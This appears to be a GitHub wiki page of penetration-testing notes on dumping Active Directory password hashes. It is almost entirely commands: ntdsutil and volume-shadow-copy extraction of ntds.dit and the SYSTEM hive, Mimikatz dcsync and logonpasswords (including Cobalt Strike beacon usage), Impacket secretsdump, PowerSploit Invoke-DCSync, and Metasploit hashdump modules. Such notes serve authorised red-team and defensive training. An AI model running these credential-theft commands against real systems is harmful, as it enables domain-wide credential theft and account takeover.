Dumping Domain Hashes - CraigDonkin/Infrastructure GitHub Wiki
- Stored on disk in NTLM
- Older versions of windows may also store using LM
- C:\Windows\NTDS\ntds.dit
- C:\windows\system32\config\SYSTEM
- Microsoft built in tool
- Automatically finds the files, takes a volume shadow copy
C:\> ntdsutil
C:\> ntdsutil
activate instanse ntds
ifm
create full c:\audit
quit
quit
- Creates a folder C:\audit containing the ntds.dit and SYSTEM file
- Create a Volume shadow copy
vssadmin create shadow /for=C:
- Extract NTDS.dit from VSC
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds.dit C:\audit\ntds.dit
- Copy SYSTEM file
REG SAVE HKLM\SYSTEM C:\audit\SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SYSTEM C:\audit\SYSTEM
lsadump::dcsync /domain:blah.blah /all /csv
- Against a specific user:
lsadump::dcsync /domain:blah.blah /user:test
- Run the folllowing on the domain controller
privilege::debug
lsadump::lsa /inject
- Mimikatz executes in a temporary process that is then destroyed. So you need to chain commands together.
mimikatz token::elevate ; lsadump::sam
mimikatz !sekurlsa::logonpasswords
-
To elevate the beacon to SYSTEM append
!to the command like!lsadump::sam -
To do a dcsync the
@caracter is needed to interact with the remote system `mimikatz @lsadump::dcsync /user:
- With domain admin user:
secretsdump.py -just-dc-ntlm <domain>/<user>@<domain-controller> -outfile file
-
Drop the -just-dc-ntlm if you also want LSASS secrets
-
Offline mode with NTDS.dit and SYSEM hive
secretsdump.py -system SYSTEM -ntds NTDS.dit LOCAL
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/VolumeShadowCopyTools.ps1
Import-Module .\VolumeShadowCopyTools.ps1
New-VolumeShadowCopy -Volume C:\
Get-VolumeShadowCopy
Invoke-DCSync
Invoke-DCSync -PWDumpFormat
auxiliary/admin/smb/psexec_ntdsgrab
windows/gather/credentials/domain_hashdump
From inside meterpreter:
hashdump